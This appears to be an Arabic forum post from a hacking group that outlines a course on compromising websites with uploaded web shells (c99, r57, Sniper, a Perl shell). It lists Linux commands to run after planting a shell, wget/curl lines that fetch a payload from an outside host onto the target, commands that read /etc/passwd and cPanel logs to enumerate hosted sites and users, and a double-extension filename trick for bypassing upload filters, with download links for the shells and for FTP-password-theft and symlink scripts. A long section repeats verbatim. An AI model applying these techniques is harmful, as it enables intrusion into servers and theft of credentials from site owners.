يتقسم الشرح الى عدد من الدروس كل درس بفيديو خاص ..
1 - تعريف الشل ..
2 - التعرف على ادوات الهكر ..
3 - شرح شل c99 والتعرف على اوامر الشل الهامه ..
4 - شرح شل r57 وطرق التنقل بالملفات ..
5 - شرح شل سنايبر وكيفية الاتصال بالنت كات ..
6 - تعريف وشرح البيرل وتنفيذ الاوامر بكل سهوله ..
7 - شرح اداة السيميلنت لتخطي بعض المشاكل التي تواجهك احيانا ..
8 - شرح سكربت سحب تخمين الأف تي بي ..
9 - شرح خاص لشل قراصنة غزه لتخطي جميع الحمايات عند الرفع وعند تنفيذ الاوامر ..
1 - تعريف الشل ..
الشل بأختصار هو سكربت تجسس تستطيع بواسطتة تنفيذ أوامر لجمع أكبر قدر من المعلومات تمكنك من أختراق الموقع
طبعاً الشل انواع كثيرة ليس نوعاً واحد لاكن جميعها الهدف منها تنفيذ الأوامر .. اي مهما اختلف عليك شكل الشل
أعرف ان الهدف واحد وهو تنفيذ الأوامر.
2 - ما هوه اللينكس ..
هو نضام تشغيل مثل الوندوز الذي تستخدمة ويهمنا معرفة اوامره لكي نستخدمها عندما نتمكن من رفع شل على احد المواقع
مازلنا نذكر الشل حتى هنا ولم نكتفي بالتعريف السابق .. لا تقلق لن تخرج من هذا الدرس الا وقد تعرفت عليه ان شاء الله
3 - اوامر الدورس ..
الدوس هو موجة الأوامر في نضام الوندوز الي بواسطتة تستطيع فعل كل شيء فقط المطلوب معرفة الأوامر الخاصة به وكيف تستخدم
و اوامر الدوس لا تهمنا كثيراً ولا يتطلب منك معرفتها "الأن" لاكن كتبتها للفائدة فقط.
مايهمنا هو (( اوامر الينكس )) ومادمت هاوي اختراق المواقع لابد ان تتعرف على هذه الأوامر وان شاء الله سيخصص درس مفصل عنها
ولأن الموضوع هام جدا احببت ان يكون اوامر اللينكس الهامه بدون شرح فيديو حتى يتفرغ الطالب لـ قراأتها تفصيليا وحفظ الاوامر الهامه بـ txt وسيكون شروحات الفيديو بالتفصيل وتطبيق هذه الاوامر وتم تطوير بعض هذه الاوامر من قبل قراصنة غزه لتسهيل عملية الأختراق + الوصول للهدف وأيضا لإثبات قدرتنا ...
اوامر اللينكس .. حملها من هنا
وضحت في الكلام السابق عن نضام الينكس وقلت انه نضام تشغيل وله اوامر ولم اتطرق او اكتب اي امر
وتركت لهذي الأوامر درس خاص بها لتصل المعلومات بأبسط صورة ممكنة .. ابدأ بعض الأسئلة المهمة تمهيداً للدرس
مافائدة اوامر الينكس؟
فائدتها بأختصار لا تستطيع الأختراق أو التحكم بدونها .. معناته ان مجال اختراق المواقع يعتمد على هذي الأوامر في كل صغيرة وكبيرة
بعد معرفة الأوامر اين تكتب ومن اخاطب بهذه الأوامر؟
تكتب الأوامر في الشل بعد زرعه او رفعه في الموقع المستهدف (تم الشرح فيديو بدرس مخصص )
وتخاطب بهذه الأوامر السيرفر الذي عليه هذا الموقع وتطلب منه فعل ماتريد في "حدود معينة"
سنقوم الأن بالتعرف على بعض اوامر الينكس الي راح تفيدنا في الأختراق ان شاء الله
الأمر: id
وظيفته: عرض صلاحياتك على السيرفر
شكل الأمر في ساحة العرض
الأمر: pwd
وظيفته: اظهار مكانك على السيرفر (المسار الي انت عليه)
مثال: إذا كنت داخل على يوزر بأسم gaza في مجلد المنتدى لنفترض انه بأسم vb
بعد تطبيق امر pwd راح يعرض لنا هذا المسار
/ home / gaza / public_html / vb
شكل الأمر في ساحة العرض
الأمر: ls -la
وظيفته: عرض جميع الملفات والمجلدات مع تصاريحها
طبعاً يعرض لك على حسب المجلد الذي انت بداخله عند تنفيذ هذا الأمر
شكل الأمر في ساحة العرض
الأمر: cat
وظيفته: قراءة الملفات
مثال: إذا أردت قراءة كود ملف بأسم config.php يكون الأمر بهذا الشكل cat config.php
الأمر: mkdir
وظيفته: إنشاء مجلد جديد
مثال: إذا أردت إنشاء مجلد بأسم gaza يكون الأمر بهذا الشكلmkdir gaza
الأمر: chmod xxx
وظيفته: تغيير تصريح مجلد او ملف
مثال: إذا اردت تغيير تصريح مجلد بأسم gaza يكون الأمر بهذا الشكل chmod xxx gaza
مع تغيير xxx الى رقم التصريح المطإذاب
الأمر: touch
وظيفته: إنشاء ملف
مثال: إذا أردت إنشاء ملف بأسم gaza.php يكون الأمر بهذا الشكلtouch gaza.php
طبعاً الملف راح يكون فارغ وخالي من الأكواد ممكن انت تكتب فيه شي عن طريق "تحرير الملفات" في الشل
الأمر: mv
وظيفته: نقل الملفات أو تغيير تسميتها
مثال لنقل ملف: إذا أردت نقل ملف بأسم gaza.php الى مكان أخر يكون الأمر بهذا الشكل
mv gaza.php / home / ??? / public_html / cc
وتستبدل / home / ??? / public_html / cc الى مسار المجلد الي بتنقل الملف اليه
ويشترط ان يكون هذا المجلد يحمل تصريح 777 (drwxrwxrwx)
مثال لتغيير تسمية الملف: إذا أردت تغير تسمية ملف بأسم n.phpالى c.php
يكون الأمر بهذا الشكل mv n.php c.php
الأمر: cp
وظيفته: نسخ الملفات
مثال: إذا أردت نسخ ملف بأسم gaza.php الى مكان أخر يكون الأمر بهذا الشكل
cp gaza.php / home / ??? / public_html / up
وتستبدل / home / ??? / public_html / up الى مسار المجلد الي بتنسخ الملف اليه
ويشترط ان يكون هذا المجلد يحمل تصريح 777 (drwxrwxrwx)
الأمر: rm
وظيفته: حذف ملف
مثال: إذا أردت حذف ملف بأسم dd.php يكون الأمر بهذا الشكل rm dd.php
الأمر: rm -r
وظيفته: حذف مجلد
مثال: إذا أردت حذف مجلد بأسم gaza يكون الأمر بهذا الشكل rm -r gaza
الأمر: *
وظيفته: يضاف الى الأوامر المذكورة سابقاً وهي ترمز الى "الكل"
مثال: إذا كنت بداخل مجلد يحتوي على ملفات كثيرة وانت تريد تغيير صلاحيات جميع هذه الملفات
إلى تصريح معين من المتعب أن تقوم بتغييرها ملف ملف .. فهذا الأمر يختصر المسألة
بحيث تقوم مثلاً بتطبيق هذا الأمر chmod 777 * في هذي الحالة بتلاحظ ان جميع محتويات المجلد وحدت تصاريحها الى التصريح المطلوب
الأمر: find
وظيفته: البحث عن ماتريده
مثال: إذا أردت أن تبحث عن ملف بأسم d.php سيكون الأمر بهذا الشكل find d.php
شكل الأمر في ساحة العرض
مثال أخر: إذا أردت أن تبحث عن أمتداد معين مثل .php يكون الأمر بهذا الشكل find *.php
شكل الأمر
مثال أخر: إذا أردت أن تبحث عن أسم معين مثل rr سواء كان نوعة ملف او مجلد يكون الأمر بهذا الشكل find rr*
شكل الأمر
الأمر: ;
وظيفته: الربط بين الأوامر وتنفيذها جميعها في وقت واحد
مثال: لو اردت انشاء ملف ثم عرض محتويات المجلد للتأكد بأنه قام بأنشاء الملف
يكون الأمر بهذا الشكل touch file.php;ls -la كما تشاهد في الأصل الأمر يتكون من امرين
هما touch و ls -la طبعاً تقدر تربط اكثر من امرين وانصح بالأكثار من أستخدامه لأنه بيساعدك كثير
شكل الأمر في ساحة العرض
الأمرين المطبقة في الصوره هي ls -la و id
أوامر رفع الملفات
لرفع اي ملف تريد ويفضل ان يكون مضغوط .. طبعاً يكون الملف على رابط وليس من جهازك ويوجد أكثر من امر لرفع الملفات وراح اطرح أكثر من أمر لكي لا يصعب عليك رفع ملف في أي حال
لأن بعض أوامر الرفع لا تستجيب على بعض السيرفرات
قبل ماتنفذ أمر الرفع تقوم بتطبيق "أمر التأكد" هل يمكنك رفع ملف بواسطة هذا الأمر او لا
أمر الرفع: wget
طريقة عمل الأمر: wget www.???.com/gaza.zip
أمر الرفع: curl
طريقة عمل الأمر: curl -o tryag.zip www.???.com/gaza.zip
أمر الرفع: GET
طريقة عمل الأمر: GET www.???.com/gaza.zip > gaza.zip
أمر الرفع: lynx
طريقة عمل الأمر: lynx -source www.???.com/gaza.zip > gaza.zip
أمر التأكد من عمل اوامر الرفع: which xxxx واتسبدل xxxx بأمر الرفع
اذا كان الناتج بهذا الشكل / usr / bin /xxxx معناتة يمكنك أستخدام هذا الأمر في الرفع
xxxx تتغير إلى أمر الرفع الي طبقتة
الأمر: unzip
وظيفته: فك ضغط الملفات والمجلدات المضغوطة بواسطة برنامج الضغط winzip
مثال: إذا أردات أن تقوم بفك ضغط ملف بأسم casper.zip يكون الأمر بهذا الشكل unzip casper.zip
نكتفي بطرح هذي الأوامر
للمعلومية جميع الأوامر السابقة تستطيع تسميتها بالأوامر الداخلية لأنها تنفذ في نفس المسار الي انت بداخله
وسأطرح بعض الأوامر الخارجية
واغلب الأوامر الخارجية تكون لأهداف معينة تفيدنا بجمع المعلومات
ملاحظة: جميع الأوامر التي بأسفل عند تنفيذها قم بحذف النقاط لأن النقاط كتبت بسبب حماية المنتدى تمنع كتابة مثل هذي الأوامر
الأمر: cat /etc/passwd
وظيفته: إظهار جميع يوزرات المواقع
الأمر: ls /var/named
وظيفته: إظهار المواقع
الأمر: ls -la /etc/valiases
وظيفته: إظهار المواقع+يوزراتها
الأمر: cat /var/cpanel/accounting.log
وظيفته: إظهار جميع المواقع+يوزراتها
الأمر: find / -type f -name "gaza*"
وظيفته: أمر بحث شامل في جميع انحاء السيرفر فقط استبدلgaza بالأسم الي تبحث عنه
اكتفي بهذي المجموعة من الأوامر ويوجد المزيد يمكنك اكتشافة اذا استمريت في تطبيق الأوامر والبحث عنها
اضيف الى الشرح تطبيق عملي للأوامر الداخلية بالفديو و ان شاء الله يصير سهل عليكم
وايضا التعديل ان كان هناك خطأ من اخونا mr.le0n
ان اصبت فهو توفيق من عند الله تعالى وان اخطأت فهو من عند الشيطان ...
الشكر الخاص لـ كل من ساعدني بتجميع هذه الاوامر وشرحها تفصيلاً .. والان نذهب للفيديو بالصوت
اوامر اللينكس .. حملها من هنا
وضحت في الكلام السابق عن نضام الينكس وقلت انه نضام تشغيل وله اوامر ولم اتطرق او اكتب اي امر
وتركت لهذي الأوامر درس خاص بها لتصل المعلومات بأبسط صورة ممكنة .. ابدأ بعض الأسئلة المهمة تمهيداً للدرس
مافائدة اوامر الينكس؟
فائدتها بأختصار لا تستطيع الأختراق أو التحكم بدونها .. معناته ان مجال اختراق المواقع يعتمد على هذي الأوامر في كل صغيرة وكبيرة
بعد معرفة الأوامر اين تكتب ومن اخاطب بهذه الأوامر؟
تكتب الأوامر في الشل بعد زرعه او رفعه في الموقع المستهدف (تم الشرح فيديو بدرس مخصص )
وتخاطب بهذه الأوامر السيرفر الذي عليه هذا الموقع وتطلب منه فعل ماتريد في "حدود معينة"
سنقوم الأن بالتعرف على بعض اوامر الينكس الي راح تفيدنا في الأختراق ان شاء الله
الأمر: id
وظيفته: عرض صلاحياتك على السيرفر
شكل الأمر في ساحة العرض
الأمر: pwd
وظيفته: اظهار مكانك على السيرفر (المسار الي انت عليه)
مثال: إذا كنت داخل على يوزر بأسم gaza في مجلد المنتدى لنفترض انه بأسم vb
بعد تطبيق امر pwd راح يعرض لنا هذا المسار
/ home / gaza / public_html / vb
شكل الأمر في ساحة العرض
الأمر: ls -la
وظيفته: عرض جميع الملفات والمجلدات مع تصاريحها
طبعاً يعرض لك على حسب المجلد الذي انت بداخله عند تنفيذ هذا الأمر
شكل الأمر في ساحة العرض
الأمر: cat
وظيفته: قراءة الملفات
مثال: إذا أردت قراءة كود ملف بأسم config.php يكون الأمر بهذا الشكل cat config.php
الأمر: mkdir
وظيفته: إنشاء مجلد جديد
مثال: إذا أردت إنشاء مجلد بأسم gaza يكون الأمر بهذا الشكلmkdir gaza
الأمر: chmod xxx
وظيفته: تغيير تصريح مجلد او ملف
مثال: إذا اردت تغيير تصريح مجلد بأسم gaza يكون الأمر بهذا الشكل chmod xxx gaza
مع تغيير xxx الى رقم التصريح المطإذاب
الأمر: touch
وظيفته: إنشاء ملف
مثال: إذا أردت إنشاء ملف بأسم gaza.php يكون الأمر بهذا الشكلtouch gaza.php
طبعاً الملف راح يكون فارغ وخالي من الأكواد ممكن انت تكتب فيه شي عن طريق "تحرير الملفات" في الشل
الأمر: mv
وظيفته: نقل الملفات أو تغيير تسميتها
مثال لنقل ملف: إذا أردت نقل ملف بأسم gaza.php الى مكان أخر يكون الأمر بهذا الشكل
mv gaza.php / home / ??? / public_html / cc
وتستبدل / home / ??? / public_html / cc الى مسار المجلد الي بتنقل الملف اليه
ويشترط ان يكون هذا المجلد يحمل تصريح 777 (drwxrwxrwx)
مثال لتغيير تسمية الملف: إذا أردت تغير تسمية ملف بأسم n.phpالى c.php
يكون الأمر بهذا الشكل mv n.php c.php
الأمر: cp
وظيفته: نسخ الملفات
مثال: إذا أردت نسخ ملف بأسم gaza.php الى مكان أخر يكون الأمر بهذا الشكل
cp gaza.php / home / ??? / public_html / up
وتستبدل / home / ??? / public_html / up الى مسار المجلد الي بتنسخ الملف اليه
ويشترط ان يكون هذا المجلد يحمل تصريح 777 (drwxrwxrwx)
الأمر: rm
وظيفته: حذف ملف
مثال: إذا أردت حذف ملف بأسم dd.php يكون الأمر بهذا الشكل rm dd.php
الأمر: rm -r
وظيفته: حذف مجلد
مثال: إذا أردت حذف مجلد بأسم gaza يكون الأمر بهذا الشكل rm -r gaza
الأمر: *
وظيفته: يضاف الى الأوامر المذكورة سابقاً وهي ترمز الى "الكل"
مثال: إذا كنت بداخل مجلد يحتوي على ملفات كثيرة وانت تريد تغيير صلاحيات جميع هذه الملفات
إلى تصريح معين من المتعب أن تقوم بتغييرها ملف ملف .. فهذا الأمر يختصر المسألة
بحيث تقوم مثلاً بتطبيق هذا الأمر chmod 777 * في هذي الحالة بتلاحظ ان جميع محتويات المجلد وحدت تصاريحها الى التصريح المطلوب
الأمر: find
وظيفته: البحث عن ماتريده
مثال: إذا أردت أن تبحث عن ملف بأسم d.php سيكون الأمر بهذا الشكل find d.php
شكل الأمر في ساحة العرض
مثال أخر: إذا أردت أن تبحث عن أمتداد معين مثل .php يكون الأمر بهذا الشكل find *.php
شكل الأمر
مثال أخر: إذا أردت أن تبحث عن أسم معين مثل rr سواء كان نوعة ملف او مجلد يكون الأمر بهذا الشكل find rr*
شكل الأمر
الأمر: ;
وظيفته: الربط بين الأوامر وتنفيذها جميعها في وقت واحد
مثال: لو اردت انشاء ملف ثم عرض محتويات المجلد للتأكد بأنه قام بأنشاء الملف
يكون الأمر بهذا الشكل touch file.php;ls -la كما تشاهد في الأصل الأمر يتكون من امرين
هما touch و ls -la طبعاً تقدر تربط اكثر من امرين وانصح بالأكثار من أستخدامه لأنه بيساعدك كثير
شكل الأمر في ساحة العرض
الأمرين المطبقة في الصوره هي ls -la و id
أوامر رفع الملفات
لرفع اي ملف تريد ويفضل ان يكون مضغوط .. طبعاً يكون الملف على رابط وليس من جهازك ويوجد أكثر من امر لرفع الملفات وراح اطرح أكثر من أمر لكي لا يصعب عليك رفع ملف في أي حال
لأن بعض أوامر الرفع لا تستجيب على بعض السيرفرات
قبل ماتنفذ أمر الرفع تقوم بتطبيق "أمر التأكد" هل يمكنك رفع ملف بواسطة هذا الأمر او لا
أمر الرفع: wget
طريقة عمل الأمر: wget www.???.com/gaza.zip
أمر الرفع: curl
طريقة عمل الأمر: curl -o tryag.zip www.???.com/gaza.zip
أمر الرفع: GET
طريقة عمل الأمر: GET www.???.com/gaza.zip > gaza.zip
أمر الرفع: lynx
طريقة عمل الأمر: lynx -source www.???.com/gaza.zip > gaza.zip
أمر التأكد من عمل اوامر الرفع: which xxxx واتسبدل xxxx بأمر الرفع
اذا كان الناتج بهذا الشكل / usr / bin /xxxx معناتة يمكنك أستخدام هذا الأمر في الرفع
xxxx تتغير إلى أمر الرفع الي طبقتة
الأمر: unzip
وظيفته: فك ضغط الملفات والمجلدات المضغوطة بواسطة برنامج الضغط winzip
مثال: إذا أردات أن تقوم بفك ضغط ملف بأسم casper.zip يكون الأمر بهذا الشكل unzip casper.zip
نكتفي بطرح هذي الأوامر
للمعلومية جميع الأوامر السابقة تستطيع تسميتها بالأوامر الداخلية لأنها تنفذ في نفس المسار الي انت بداخله
وسأطرح بعض الأوامر الخارجية
واغلب الأوامر الخارجية تكون لأهداف معينة تفيدنا بجمع المعلومات
ملاحظة: جميع الأوامر التي بأسفل عند تنفيذها قم بحذف النقاط لأن النقاط كتبت بسبب حماية المنتدى تمنع كتابة مثل هذي الأوامر
الأمر: cat /etc/passwd
وظيفته: إظهار جميع يوزرات المواقع
الأمر: ls /var/named
وظيفته: إظهار المواقع
الأمر: ls -la /etc/valiases
وظيفته: إظهار المواقع+يوزراتها
الأمر: cat /var/cpanel/accounting.log
وظيفته: إظهار جميع المواقع+يوزراتها
الأمر: find / -type f -name "gaza*"
وظيفته: أمر بحث شامل في جميع انحاء السيرفر فقط استبدلgaza بالأسم الي تبحث عنه
اكتفي بهذي المجموعة من الأوامر ويوجد المزيد يمكنك اكتشافة اذا استمريت في تطبيق الأوامر والبحث عنها
اضيف الى الشرح تطبيق عملي للأوامر الداخلية بالفديو و ان شاء الله يصير سهل عليكم
وايضا التعديل ان كان هناك خطأ من اخونا mr.le0n
ان اصبت فهو توفيق من عند الله تعالى وان اخطأت فهو من عند الشيطان ...
الشكر الخاص لـ كل من ساعدني بتجميع هذه الاوامر وشرحها تفصيلاً .. والان نذهب للفيديو بالصوت
جميع الادوات التي تلزمنا في الدوره هنا ..
Download
http://www.mediafire.com/?tvat2wgqgze
السلام عليكم ورحمة الله وبركاته
شرح شل c99 والتعرف على اوامر الشل الهامه
Download
http://www.mediafire.com/?n4wymmy2vio
http://www.mediafire.com/?4lkwetynbrb
http://www.mediafire.com/?z4zgmzltdzz
السلام عليكم ورحمة الله وبركاته
شرح شل سنايبر وكيفية الاتصال بالنت كات
Download
http://www.mediafire.com/?vmnib0kczdh
السلام عليكم ورحمة الله وبركاته
Download
1 - رفع البيرل عن طريق الشل ..
http://www.mediafire.com/?ctigmzmnzco
2 - رفع البيرل عن طريق الاف تي بي ..
http://www.mediafire.com/?hn3jwm4n5qj
3 - رفع البيرل عن طريق السيبانيل ..
http://www.mediafire.com/?yomqzgzgdgm
السلام عليكم ورحمة الله وبركاته
شرح سكربت السملنك - Symlink - لعرض اليزرات
Download
http://www.mediafire.com/?jaiyizdj2yi
السلام عليكم ورحمة الله وبركاته
شرح سحب باسوورد الاف تي بي عن طريق سكربت بعد رفع الشل
http://www.mediafire.com/?2mu2mn5di43
شرح شيل قراصنة غزة
السلام عليكم ورحمة الله وبركاته
انا اعتبر هذا الشل من اكبر انجازات فريق قراصنة غزه ..
ملاحظه : الشل كتجربه اثبت قوة لا اريد ان تحسبوني اني أبالغ كثيرا فيه او انه انا متحيز للقراصنة لا قسم بالله العظيم انه بيننا كفريق قراصنة غزه كل يوم نكتشف اشياء جديده بهذا الشل ولانه يعمل بلغة pl البيرل اثبت هذه القوة الكبيره بتخطي السيف مود عند رفعه واظهار الملفات حتى لو السيف مود اون وبأقوى حالات السيف مود فهوه تخطاها وحتى انه يمكنك رفعه بأي امتداد jpg - rar - txt - gif - إلخ من الامتدادات ولاكن عليك تسميته بالشكل التالي
gaza.php.jpg
وهذا شرح لطريقة استخدامه + تنفيذ الاوامر + كيفية رفع ملفات عليه + التنقل بالموقع او السيرفر
Download
http://www.mediafire.com/?jiwjirfw5an
عوده ب 4 شروحات استكمال ... لـ شرح وتوضيح لجميع سكربتات التي يستخدمها الهكر وايضا لتسهيل عليكم الشروحات القادمه ..
شرح سكربت للاتصال بقاعدت sql لتعديل بيانات الادمن
Download
شرح سكربت للاتصال بقاعدت sql لتعديل بيانات الادمن
Download
شرح سكربت استخراج كونفقات السيرفر php
Download
http://www.mediafire.com/?2tgugmtoqze
Download
http://www.mediafire.com/?2tgugmtoqze
شرح شل Shell R57 وطرق قرأة الملفات والتنقل بالملفات
Download
http://www.mediafire.com/?wjtnwttca1b
ملاحظه : الشرح هادا خاصه اعتزر عن الخربطه فيه كنت صاحي من النوم وبدأت فيه هههه ولاكن الشرح هاا شبه شرح شل سنايبر 100%
هام : شرح برنامج الاف تي بي ftp وطريق تصريح الملفات
Download
http://www.mediafire.com/?n20kfycz0jx